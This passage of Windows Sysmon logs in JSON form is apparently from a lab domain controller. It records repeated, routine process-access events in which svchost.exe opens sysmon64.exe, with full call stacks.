{41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:29.205","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:29","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2223,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:29.205\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:29.205","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:29","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2224,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:29.205\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:29.205","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:29","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2225,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:29.205\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:29.205","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:29","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2226,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:29.205\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:29.205","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:29","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2227,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:29.205\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:29.205","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:29","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2228,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:29.205\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:29.205","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:29","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2229,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:29.205\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:29.205","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:29","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2230,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:29.205\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 